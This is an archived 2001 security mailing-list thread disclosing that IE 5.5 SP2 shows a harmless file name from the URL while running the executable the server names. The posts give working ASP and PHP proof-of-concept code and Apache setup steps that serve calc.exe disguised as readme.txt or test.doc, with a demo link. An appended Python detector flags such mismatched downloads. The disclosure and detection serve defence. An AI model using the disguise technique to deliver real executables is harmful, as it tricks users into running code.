RE: File extensions spoofable in MSIE download dialog

From: Jonathan G. Lampe (jonathanat_private)
Date: Thu Nov 29 2001 - 10:34:50 PST


    I have confirmed Jouko Pynnonen's and StatiC's findings that IE 5.5 SP2 
    allows executables to run as soon as a user has elected to open what 
    appears to be a normally harmless ".txt" file.  (IE 5.5 trusts the filename 
    provided in the link over the filename suggested by the header's filename 
    tag and/or the use of an "application/octet-stream" content type.)
    
    This bug/hole should be a compelling reason for anyone still running IE 5.5 
    or earlier to either upgrade to IE 6.0 (which still did not appear to have 
    this problem when last checked) or finally make the move to Netscape, 
    Opera, etc.  (It's about as much work no matter which company/version you 
    choose.)
    
    Here is the ASP equivalent code to StatiC's php tidbit (tested under both 
    IIS 4 and 5):
    
    <%
    ' Serve a real executable under a harmless-looking URL: the download
    ' dialog shows the URL's file name, but the bytes and the
    ' Content-Disposition name belong to calc.exe.
    Const adTypeBinary = 1
    Dim strFilePath, objStream
    
    ' Declare the payload as opaque binary and name it calc.exe.
    Response.ContentType = "application/octet-stream"
    Response.AddHeader "Content-Disposition", "attachment; filename=calc.exe"
    
    ' calc.exe sits in the same directory as this script.
    strFilePath = Server.MapPath(".") & "\calc.exe"
    
    ' ADODB.Stream reads the file as raw bytes so BinaryWrite can send it.
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Open
    objStream.Type = adTypeBinary
    objStream.LoadFromFile strFilePath
    
    Response.BinaryWrite objStream.Read
    
    objStream.Close
    Set objStream = Nothing
    
    %>
    
    Additionally, you can see this code in action here:
    
    http://208.212.86.151/test.doc
    
    (Note that the bug/hole does not just "trust" .txt extensions - .doc, .log 
    are but a few of the other ones you can slip by most users.)
    
    - Jonathan Lampe - jonathanat_private - Standard Networks, Inc. - 608-227-6100
    (Thanks to Stephen Nickels for the public posting.)
    
    At 08:51 PM 11/28/2001, you wrote:
    >I was playing with apache configs a few months ago and noticed a similar 
    >issue with IE5.5.  The procedure below will cause IE5.5 to display the 
    >open dialog for readme.txt but once opened, it executes immediately on 
    >IE5.5 sp2 with no hint that it is really getting an executable file called 
    >calc.exe.  I only tested it with IE5.5.
    >
    >With an apache/php server add .txt to the already existing .php extension 
    >in the apache.conf file, so that apache will recognise .txt extensions as 
    >php script files.
    >
    >1. Copy the real windows calc.exe from a windows system to the html root dir.
    >
    >2. Copy the readme.txt file below to the same html root dir.
    >
    >3. go to the url http://yourserver/readme.txt
    >
    >You will see the same behavior mentioned in the previous alert.
    >
    >FILE <readme.txt> BEGIN ----
    ><?php
    >// Apache has been told to run .txt through PHP, so this "text file"
    >// is a script. The headers name the download calc.exe and mark it as
    >// binary; only the URL still says readme.txt.
    >header("Content-Type: application/octet-stream");
    >header("Content-Disposition: attachment; filename=calc.exe");
    >// Stream the real executable from the same directory.
    >readfile("calc.exe");
    >?>
    >FILE <readme.txt> END ----
    >
    >Why does Microsoft think it is wise to trust the filename in the URL over 
    >what the header content-type is set to for display purposes, since the 
    >content-type seems to take priority for what will really happen with the file?
    >
    >StatiC
    
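The mismatch StatiC points out above (the URL ends in readme.txt while the Content-Disposition header and the bytes themselves say calc.exe) is also easy to catch on the wire, at a proxy or in web-server logs. The following Python is an added example, not code from either poster: it takes a request URL plus the response headers, compares the URL's extension with the file name the server suggests and with the content type, and reports the combinations that make up this trick. The host example.invalid, the three sample responses and the list of executable extensions are constructed for the example.

```python
"""Flag HTTP downloads whose URL extension disagrees with the real file name.

Added example (not from the original thread): the check a proxy or log-review
script could run to catch a response that is fetched as readme.txt but
delivered as calc.exe.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Extensions Windows runs directly when the user chooses "Open"
# (assumed list for this example; extend as needed).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".hta"}

# Content types that mean "download me as opaque bytes".
OPAQUE_TYPES = {"application/octet-stream", "application/x-msdownload"}

# Extensions users tend to treat as harmless documents.
BENIGN_LOOKING_EXTS = {".txt", ".log", ".doc"}

_FILENAME_RE = re.compile(r'filename\s*=\s*"?([^";]+)"?', re.IGNORECASE)


def url_extension(url):
    """Lower-cased extension of the URL's last path segment ('' if none)."""
    path = unquote(urlsplit(url).path)
    return posixpath.splitext(posixpath.basename(path))[1].lower()


def disposition_filename(headers):
    """File name carried in Content-Disposition, or None if there is none."""
    for name, value in headers:
        if name.lower() == "content-disposition":
            m = _FILENAME_RE.search(value)
            if m:
                # Drop any directory part smuggled into the name.
                return m.group(1).strip().replace("\\", "/").rsplit("/", 1)[-1]
    return None


def header_value(headers, wanted):
    """First value of header `wanted`, without parameters, lower-cased."""
    for name, value in headers:
        if name.lower() == wanted.lower():
            return value.split(";")[0].strip().lower()
    return None


def classify_download(url, headers):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    url_ext = url_extension(url)
    suggested = disposition_filename(headers)
    sugg_ext = posixpath.splitext(suggested)[1].lower() if suggested else ""
    ctype = header_value(headers, "Content-Type")

    # The core of the trick: the server names an executable while the URL
    # the user saw ends in something harmless.
    if sugg_ext in EXECUTABLE_EXTS and url_ext not in EXECUTABLE_EXTS:
        findings.append(
            f"URL looks like {url_ext or '(no extension)'} but server names it {suggested}")
    # A "document" URL that is served as raw binary deserves a look too.
    if ctype in OPAQUE_TYPES and url_ext in BENIGN_LOOKING_EXTS:
        findings.append(f"{url_ext} resource delivered as {ctype}")
    return findings


# Constructed samples: the readme.txt -> calc.exe case from the thread,
# a genuine text file, and an honestly named executable download.
SAMPLES = {
    "spoofed": ("http://example.invalid/readme.txt",
                [("Content-Type", "application/octet-stream"),
                 ("Content-Disposition", "attachment; filename=calc.exe")]),
    "benign_text": ("http://example.invalid/readme.txt",
                    [("Content-Type", "text/plain")]),
    "honest_exe": ("http://example.invalid/setup.exe",
                   [("Content-Type", "application/octet-stream"),
                    ("Content-Disposition", "attachment; filename=setup.exe")]),
}


def run_samples():
    """Classify every constructed sample; returns {name: findings}."""
    return {name: classify_download(url, hdrs) for name, (url, hdrs) in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in run_samples().items():
        print(name, "->", findings or "ok")
```

Run it as a script to see the three constructed samples classified; in practice the same function would be fed from proxy or web-server logs that record both the request path and the response's Content-Disposition and Content-Type headers.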



    This archive was generated by hypermail 2b30 : Thu Nov 29 2001 - 13:10:34 PST